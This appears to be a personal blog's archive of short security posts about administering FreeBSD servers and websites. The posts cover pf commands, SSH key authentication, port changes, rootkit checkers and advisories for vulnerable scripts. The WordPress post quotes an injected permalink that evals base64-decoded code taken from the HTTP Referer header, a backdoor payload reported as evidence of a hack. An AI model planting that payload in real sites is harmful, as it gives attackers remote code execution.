
Posts in Security

Frequently used pf commands

November 9, 2013 Posted in Security

For my own convenience due to bad memory: (valid only with this article)

// Add or remove IP/subnet
# pfctl -t blockedips -T add 1.2.3.4
# pfctl -t blockedips -T delete 1.2.3.4

// Flush all NAT, filter, state, and table rules and reload /etc/pf.conf.
# pfctl -F all -f /etc/pf.conf

// View all IP addresses listed in the table
# pfctl -t blockedips -T show

// View statistics for each IP/CIDR
# pfctl -t blockedips -T show -v

How to Setup Key Based Authentication in SSH

March 8, 2011 Posted in Security

This is for a Windows client; please refer to this page for a FreeBSD workstation.

Key Based Authentication, step by step

1. Download PuTTYgen (on Windows), generate private/public key pair.

Welcome to Nginx! What’s This?

July 23, 2010 Posted in Security

When I visited one of my sites, I got a page with only the bold and big text:

Welcome to Nginx!

It looked like my site was hacked; actually, I was pretty sure about it at that moment. I almost wanted to roll out my backup. Fortunately it was back to normal 20 minutes later, so then I thought it might be my computer’s problem. After some digging, it turned out to be my ISP’s problem: somehow my ISP treated my site as an invalid domain and displayed their own search engine (evil), but their own site didn’t work, hence the default page from their proxy server.

Key Based Authentication in SSH

March 5, 2010 Posted in Security

I just changed my SSH authentication from password to key-based. If you are using password authentication, I strongly suggest you change it. It’s a must, the setup is also very easy, and there is no reason not to do this. With all kinds of buggy programs and scripts, our servers are much, much weaker than we thought.

Edit: Wrote a step by step guide for easy reference.

Urgent Security Warning for WordPress

September 5, 2009 Posted in Security

I just found that my two WordPress blogs were hacked; the permanent link structure was changed to:

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

This meant the individual posts couldn’t be accessed.

I don’t know how this was hacked, or what other damage was caused. For now, an urgent solution would be protecting the wp-admin directory.

I have seen some other hacked blogs, so I strongly suggest you take action immediately. The above might not be a good solution, but it should be helpful.

Scary Moment

March 30, 2009 Posted in Security

When I was restarting Apache after installing a new PHP module, I found that httpd.conf was missing. That was scary! I have absolutely no idea how this happened; the only possible reason is that I deleted it by accident.

Another Hack on Third-party Script

November 22, 2008 Posted in Security

PHPClassifieds 7.5 has a SQL injection vulnerability. The detailed how-to was posted publicly, which caused many classifieds websites to be hacked. The fix is here.

Change FTP Port

December 31, 2005 Posted in FTP, Security

After I changed the ssh port, combined with the changes to net.inet.tcp.blackhole and net.inet.udp.blackhole, the server is now completely free of ssh login attempts. I realized these two changes should be made together; it doesn’t make much sense to change only one of them. For example, if you only change the port, the server will still respond to port scans, and it very probably gets more scan activity. What if you only change the system variables? Since the ports of common services are the main target, the evil people can still easily find the ports to attack.

Change sshd Port

December 26, 2005 Posted in Security

I used the default port number 22 for sshd, and the server got lots of login attempts every day, which left thousands of lines in the daily security run output.

Security Discussion

November 21, 2005 Posted in Security

On the FreeBSD security mailing list, there is a post about a compromised box which got many interesting replies: Need urgent help regarding security

Contact Form Abused Through BCC Field

November 16, 2005 Posted in Security

A simple contact form on my website was abused to send spam. I received weird messages sent from the contact form in the past two weeks; I thought it was just from some boring persons, and didn’t pay attention to it until I got some messages bounced back from other servers. After checking the mail queue, I was shocked that there were still a few emails with a very long recipient list.

Here is my original code:

No. 1 Keyword Referrer “phpBB Hack”

November 5, 2005 Posted in Security

Google seems to like this blog a lot; new posts were picked up and ranked in the top 10 within a couple of days, which is simply amazing to me. Although this blog has quite a few keywords with great ranking, such as “FreeBSD server”, the most searched term is “phpBB hack”. Several visitors even came here with “how to hack phpBB”.

Chkrootkit 0.46 Problem

October 30, 2005 Posted in Security

Cordeiro posted the following message on the FreeBSD security list. I didn’t test it (I don’t have a testing server).

…don’t use chkrootkit 0.46 on production machines.
The “chkproc” process sends a SIGXFSZ (25) signal to init,
that interprets this signal as a “disaster” and reboots
after a 30s sleep.

I tested chkrootkit (0.45) and Rootkit Hunter before. I prefer Rootkit Hunter.

Rootkit Hunter – Another Root Kits Checking Tool

August 17, 2005 Posted in Security

I have tried chkrootkit, and I think it’s a very good tool. The book “Mastering FreeBSD and OpenBSD Security”, a security bible to me, only mentioned Rootkit Hunter, so I decided to give it a try.

Arbitrary Code Execution Vulnerability in Awstats 6.4

August 16, 2005 Posted in Security

There is a new vulnerability in Awstats 6.4; a detailed explanation is here. The new development version 6.5 has addressed this issue, but it is not yet available in ports. Awstats 6.4 has been marked forbidden in the ports; “make install” will display the following message, which is different from the portaudit error:
